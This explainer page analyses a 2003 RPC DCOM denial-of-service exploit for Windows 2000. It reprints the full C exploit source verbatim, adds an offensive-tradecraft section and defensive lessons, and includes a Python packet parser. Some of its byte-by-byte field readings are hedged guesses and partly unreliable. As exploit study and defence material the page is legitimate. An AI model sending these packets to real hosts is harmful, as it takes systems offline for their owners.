Understanding the RPC DCOM Interface Denial of Service Exploit (Paper ID 61)

## What this paper is
This paper details a Denial of Service (DoS) vulnerability in Microsoft Windows Server 2000's implementation of the Remote Procedure Call (RPC) Distributed Component Object Model (DCOM) interface. The exploit, discovered by Xfocus.org and coded by FlashSky, targets a specific flaw that allows an attacker to crash the RPCSS service, leading to a system-wide denial of service. It is explicitly stated that this is not the MS03-026 vulnerability.
## Simple technical breakdown
The exploit works by sending specially crafted RPC DCOM packets to the target server on port 135 (the standard RPC/DCOM port). These packets are designed to overload or mismanage a resource within the RPCSS service. When the service attempts to process these malformed requests, it enters an unstable state and crashes. This crash prevents legitimate RPC/DCOM communication, effectively making the server unavailable for services that rely on it.
The exploit uses two main data structures: `bindstr` and `request`.
- `bindstr`: This appears to be an initial RPC binding request. It likely tries to establish a connection or query for available services within the DCOM interface.
- `request`: This is the core of the DoS payload. It contains a sequence of 0x31 bytes, which is unusual and likely intended to trigger the vulnerability by causing an unexpected condition or buffer overflow within the RPCSS service.
The C code orchestrates sending these crafted packets over a TCP socket to the target's port 135.
## Complete code and payload walkthrough
The provided C code implements a simple network client to exploit the vulnerability.
Includes:
- `winsock2.h`: For Windows Sockets API functions (network communication).
- `stdio.h`: For standard input/output functions like `printf`.
- `windows.h`: For Windows-specific API functions.
- `process.h`: For process control functions (though `exit` is used, which is in `stdlib.h` or `stdio.h` generally).
- `string.h`: For string manipulation functions.
- `winbase.h`: For Windows Base API functions.
Global Data:
- `unsigned char bindstr[]`: This array holds the bytes for the initial RPC binding request.
  - `0x05, 0x00, 0x0B, 0x03, 0x10, 0x00, 0x00, 0x00`: These bytes likely represent the RPC version, call type, and length of the subsequent data.
  - `0x48, 0x00, 0x00, 0x00`: This might indicate the maximum transmit/receive fragment size.
  - `0x7F, 0x00, 0x00, 0x00`: This could be a network address or identifier.
  - `0xD0, 0x16, 0xD0, 0x16, 0x00, 0x00, 0x00, 0x00`: This sequence is characteristic of RPC/DCOM packet structures, possibly related to the interface UUID or operation number.
  - `0x01, 0x00, 0x00, 0x00`: Likely a sequence number or call ID.
  - `0x01, 0x00, 0x01, 0x00`: Could represent the number of authentication information elements or other flags.
  - `0xA0, 0x01, 0x00, 0x00`: Possibly related to the authentication level or type.
  - `0x00, 0x00, 0x00, 0x00`: Padding or null fields.
  - `0xC0, 0x00, 0x00, 0x00`: Another potential size or identifier field.
  - `0x00, 0x00, 0x00, 0x46`: More header information.
  - `0x00, 0x00, 0x00, 0x00`: Padding.
  - `0x04, 0x5D, 0x88, 0x8A, 0xEB, 0x1C, 0xC9, 0x11, 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60`: This is a 16-byte sequence, which strongly suggests it's a UUID (Universally Unique Identifier). This specific UUID is associated with the DCOM Remote Protocol.
  - `0x02, 0x00, 0x00, 0x00`: Likely a minor version or operation code.
- `unsigned char request[]`: This array contains the malicious payload designed to trigger the DoS.
  - `0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00`: Similar RPC header as `bindstr`.
  - `0x48, 0x00, 0x00, 0x00`: Max fragment size.
  - `0x13, 0x00, 0x00, 0x00`: Length of the subsequent data.
  - `0x90, 0x00, 0x00, 0x00`: Possibly an operation code or identifier.
  - `0x01, 0x00, 0x03, 0x00`: Flags or sequence information.
  - `0x05, 0x00, 0x06, 0x01`: More RPC/DCOM specific fields.
  - `0x00, 0x00, 0x00, 0x00`: Padding.
  - `0x31, 0x31, 0x31, 0x31, ...` (repeated 32 times): This is the critical part of the payload. The character '1' (ASCII 0x31) repeated many times is highly unusual for standard RPC/DCOM operations. This repetition is likely what causes the RPCSS service to misbehave, potentially leading to a buffer overflow, infinite loop, or resource exhaustion.
  - `0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00`: Trailing null bytes, possibly for padding or termination.
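As an added example (not part of the original paper or the exploit source), the following Python decodes `bindstr` and the 24-byte header of `request` with the DCE/RPC connection-oriented PDU layout, which gives firmer field names than the byte-group readings above. The function names and the `KNOWN_UUIDS` lookup table are assumptions of this example.

```python
import struct
import uuid

PTYPES = {0: "request", 2: "response", 3: "fault", 11: "bind", 12: "bind_ack"}
KNOWN_UUIDS = {  # well-known identifiers; the lookup table is this example's own
    "8a885d04-1ceb-11c9-9fe8-08002b104860": "NDR transfer syntax",
    "000001a0-0000-0000-c000-000000000046": "IRemoteSCMActivator"}
# bindstr exactly as printed in the exploit source on this page (72 bytes).
BINDSTR = bytes.fromhex(
    "05000b0310000000480000007f000000" "d016d016000000000100000001000100"
    "a001000000000000c000000000000046" "00000000045d888aeb1cc9119fe80800"
    "2b10486002000000")
# Only the 24-byte header of request[] from the page; its stub data is left out.
REQUEST_HDR = bytes.fromhex("0500000310000000" "4800000013000000" "9000000001000300")

def parse_common(pdu):
    """Decode the 16-byte header shared by all connection-oriented PDUs."""
    if len(pdu) < 16:
        raise ValueError("truncated PDU: common header needs 16 bytes")
    ver, minor, ptype, flags = struct.unpack_from("4B", pdu, 0)
    endian = "<" if pdu[4] & 0x10 else ">"  # drep[0] high nibble 1 = little-endian
    frag_len, auth_len, call_id = struct.unpack_from(endian + "HHI", pdu, 8)
    return {"version": (ver, minor), "ptype": PTYPES.get(ptype, ptype),
            "flags": flags, "endian": endian, "frag_length": frag_len,
            "auth_length": auth_len, "call_id": call_id}

def _syntax(pdu, off, endian):
    """Read one 20-byte syntax id: UUID, 32-bit version, plus a label if known."""
    if off + 20 > len(pdu):
        raise ValueError("truncated PDU: syntax id runs past end of data")
    raw = pdu[off:off + 16]
    u = str(uuid.UUID(bytes_le=raw) if endian == "<" else uuid.UUID(bytes=raw))
    (version,) = struct.unpack_from(endian + "I", pdu, off + 16)
    return u, version, KNOWN_UUIDS.get(u, "unknown")

def parse_bind(pdu):
    """Decode a bind PDU: negotiated sizes plus each presentation context."""
    h = parse_common(pdu)
    if h["ptype"] != "bind" or len(pdu) < 28:
        raise ValueError("not a complete bind PDU")
    e = h["endian"]
    h["max_xmit_frag"], h["max_recv_frag"], h["assoc_group"] = struct.unpack_from(e + "HHI", pdu, 16)
    h["contexts"], off = [], 28
    for _ in range(pdu[24]):  # n_context_elem
        if off + 24 > len(pdu):
            raise ValueError("truncated PDU: context element runs past end of data")
        ctx_id, n_syn = struct.unpack_from(e + "HBx", pdu, off)
        iface = _syntax(pdu, off + 4, e)  # abstract syntax = interface UUID + version
        transfer = [_syntax(pdu, off + 24 + 20 * i, e) for i in range(n_syn)]
        off += 24 + 20 * n_syn
        h["contexts"].append({"id": ctx_id, "interface": iface, "transfer_syntaxes": transfer})
    return h

def parse_request(pdu):
    """Decode the fixed part of a request PDU (header only, no stub parsing)."""
    h = parse_common(pdu)
    if h["ptype"] != "request" or len(pdu) < 24:
        raise ValueError("not a complete request header")
    h["alloc_hint"], h["context_id"], h["opnum"] = struct.unpack_from(h["endian"] + "IHH", pdu, 16)
    h["stub_offset"] = 24 + (16 if h["flags"] & 0x80 else 0)  # PFC_OBJECT_UUID set
    return h

if __name__ == "__main__":
    print(parse_bind(BINDSTR)["contexts"], parse_request(REQUEST_HDR)["opnum"])
```

Comparing the decoded `frag_length` with the number of bytes actually captured is a cheap sanity check when triaging traffic to port 135.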
main function:
Initialization:
- `WSADATA WSAData;`: Variable to hold Winsock initialization data.
- `SOCKET sock;`: Declares a socket variable.
- `SOCKADDR_IN addr_in;`: Declares a structure for IP address and port.
- `short port = 135;`: Sets the target port to 135, the standard for RPC/DCOM.
- `unsigned char buf1[0x1000];`: A buffer to receive data (though its use is limited).
- Prints introductory messages about the vulnerability and its discoverers.

Argument Check:
- `if (argc < 2)`: Checks if a target IP address was provided as a command-line argument.
- If not, it prints usage instructions and exits.

WSAStartup:
- `if (WSAStartup(MAKEWORD(2,0), &WSAData) != 0)`: Initializes the Winsock DLL. If it fails, it prints an error and returns.

Address Setup:
- `addr_in.sin_family = AF_INET;`: Sets the address family to IPv4.
- `addr_in.sin_port = htons(port);`: Sets the port to 135, converting it to network byte order.
- `addr_in.sin_addr.S_un.S_addr = inet_addr(argv[1]);`: Converts the target IP address string (from `argv[1]`) into a network address format.

Socket Creation:
- `if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)`: Creates a TCP socket. If it fails, it prints an error and returns.

Connection:
- `if (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in), NULL, NULL, NULL, NULL) == SOCKET_ERROR)`: Connects the socket to the target IP address and port 135. If it fails, it prints an error and returns.

First Send (`bindstr`):
- `if (send(sock, bindstr, sizeof(bindstr), 0) == SOCKET_ERROR)`: Sends the `bindstr` data to the target. This is likely an attempt to initiate an RPC binding process. If it fails, it prints an error and returns.
- `i = recv(sock, buf1, 1024, MSG_PEEK);`: This line attempts to peek at incoming data without removing it from the receive buffer. It's unclear why `MSG_PEEK` is used here, as the data is not consumed. It might be an artifact or an attempt to see if the server responds before sending the actual payload.

Second Send (`request`):
- `if (send(sock, request, sizeof(request), 0) == SOCKET_ERROR)`: Sends the malicious `request` payload to the target. This is the packet designed to trigger the DoS. If it fails, it prints an error and returns.
- `i = recv(sock, buf1, 1024, MSG_PEEK);`: Another `recv` with `MSG_PEEK`. Again, the purpose is not fully clear for a DoS exploit that aims to crash the service. It might be an attempt to confirm the connection is still open or to observe any immediate (non-crashing) response before the service is expected to crash.
Code Fragment/Block -> Practical Purpose Mapping:
- `unsigned char bindstr[]`: Initial RPC binding request packet.
- `unsigned char request[]`: Malicious payload packet containing repeated '1' characters.
- `WSADATA WSAData;`: Variable to hold Winsock initialization data.
- `SOCKET sock;`: Variable to hold the network socket descriptor.
- `SOCKADDR_IN addr_in;`: Structure to define the target IP address and port.
- `short port=135;`: Target port for RPC/DCOM.
- `unsigned char buf1[0x1000];`: Buffer for receiving data (used with `MSG_PEEK`).
- `WSAStartup(...)`: Initializes the Winsock library.
- `socket(...)`: Creates a TCP socket.
- `inet_addr(argv[1])`: Converts the target IP string to a network address.
- `WSAConnect(...)`: Establishes a TCP connection to the target.
- `send(sock, bindstr, ...)`: Sends the initial RPC binding packet.
- `recv(sock, buf1, ..., MSG_PEEK)`: Peeks at incoming data (purpose unclear for DoS).
- `send(sock, request, ...)`: Sends the malicious DoS payload.
- `exit(1)`: Terminates the program with an error code.
## Practical details for offensive operations teams
- Required Access Level: Network access to the target's port 135 (TCP). No elevated privileges on the target system are required for the execution of this exploit, as it's a network-based DoS.
- Lab Preconditions:
  - A Windows Server 2000 (or potentially other vulnerable Windows versions with the same RPC DCOM implementation) system is required for testing.
  - The target system must be accessible over the network on TCP port 135.
  - Firewalls must allow traffic to port 135.
- Tooling Assumptions:
  - A C compiler (like MinGW or Visual Studio) to compile the provided C code into an executable.
  - A network scanner (like Nmap) to identify open port 135 on potential targets.
- Execution Pitfalls:
  - False Positives: The exploit might fail if the target system is not running Windows Server 2000 or a similarly vulnerable version, or if the specific RPC DCOM service is not exposed or is patched.
  - Network Latency/Packet Loss: Unreliable network conditions could lead to the packets not being received correctly, preventing the DoS.
  - IDS/IPS Evasion: Modern Intrusion Detection/Prevention Systems (IDS/IPS) might detect the unusual packet structure or the connection to port 135 from an unknown source, blocking the attack. The `MSG_PEEK` usage might be an attempt to be stealthy, but the `send` operations are still detectable.
  - Targeted Service: The exploit targets the RPCSS service. If this service is heavily protected or if the system is configured to restart it automatically and quickly, the DoS might be temporary.
  - No Confirmation: The exploit doesn't explicitly confirm the DoS has occurred. Operators would typically rely on external checks (e.g., ping failure, inability to connect to other services) to verify the impact.
  - Recompilation: The exploit code needs to be compiled on a Windows environment or a cross-compilation setup.
- Tradecraft Considerations:
  - Reconnaissance: Prior to execution, identify target IP addresses and confirm open port 135. Use tools like Nmap with appropriate scripts to fingerprint services.
  - Stealth: The exploit is a raw TCP connection and send. It's not designed for stealth. For more covert operations, one would need to layer this within other protocols or use more sophisticated evasion techniques, which are not present in this basic exploit.
  - Impact Assessment: Understand that this is a DoS. The goal is to disrupt service, not gain access. Ensure this aligns with the authorized engagement's objectives.
  - Post-Exploitation (DoS): After a successful DoS, the next steps would depend on the engagement's goals. This might involve observing system behavior, attempting to gain access to a now-unprotected or misconfigured system (though this exploit doesn't provide that capability), or simply documenting the impact.
## Where this was used and when
- Context: This exploit targets a vulnerability in Microsoft Windows Server 2000's RPC DCOM interface. Such vulnerabilities were actively sought and exploited in the early 2000s, a period when DCOM was widely used for inter-process communication and remote administration.
- Approximate Year/Date: The paper was published on 2003-07-21. This indicates the vulnerability was likely discovered and weaponized around or before this date. Exploits of this nature were common in the years leading up to and following 2003, as security researchers and attackers explored the complexities of Windows networking services.
## Defensive lessons for modern teams
- Patch Management: The most crucial defense is to keep operating systems and services patched. While Windows Server 2000 is long out of support, this principle applies to all current systems. Vendors release patches to fix such vulnerabilities.
- Network Segmentation and Firewalls: Restrict access to critical ports like 135 (RPC/DCOM) to only trusted internal networks or specific management workstations. External exposure of port 135 is highly discouraged.
- Intrusion Detection/Prevention Systems (IDS/IPS): Deploy and maintain IDS/IPS solutions that can detect anomalous network traffic patterns, including malformed packets or unusual sequences of RPC/DCOM calls. Signature-based detection for known exploits and anomaly-based detection for deviations from normal traffic are key.
- Service Hardening: Understand the services running on your network. For DCOM, consider disabling it where not strictly necessary or limiting its configuration to reduce the attack surface.
- Vulnerability Scanning: Regularly scan your network for open ports and known vulnerabilities. This helps identify systems that might be susceptible to exploits like this.
- Logging and Monitoring: Ensure robust logging for network connections and service events. Monitoring logs can help detect attempted or successful exploitation attempts, even if the exploit itself is blocked.
## ASCII visual
This exploit involves a simple client-server interaction over TCP. A visual representation of the connection and data flow would be:
```text
+-----------------+       TCP Port 135       +----------------------+
| Attacker Client | -----------------------> | Target Server        |
| (Exploit Code)  |                          | (Windows Server 2000)|
+-----------------+                          +----------------------+
         |                                              |
         | 1. Send bindstr                              |
         |    (RPC Binding Request)                     |
         |--------------------------------------------->|
         |                                              |
         | 2. Send request                              |
         |    (Malicious DoS Payload)                   |
         |--------------------------------------------->|
         |                                              |
         | (Optional: Peek at response)                 |
         |<---------------------------------------------|
         |                                              |
```
---
## Original Exploit-DB Content (Verbatim)
```text
// This is a new unpatched vulnerability - NOT the MS03-026
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
void main(int argc,char ** argv)
{
WSADATA WSAData;
int i;
SOCKET sock;
SOCKADDR_IN addr_in;
short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org\n");
printf("Welcome to http://www.xfocus.net\n");
if(argc<2)
{
printf("useage:%s target\n",argv[0]);
exit(1);
}
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}
// milw0rm.com [2003-07-21]
```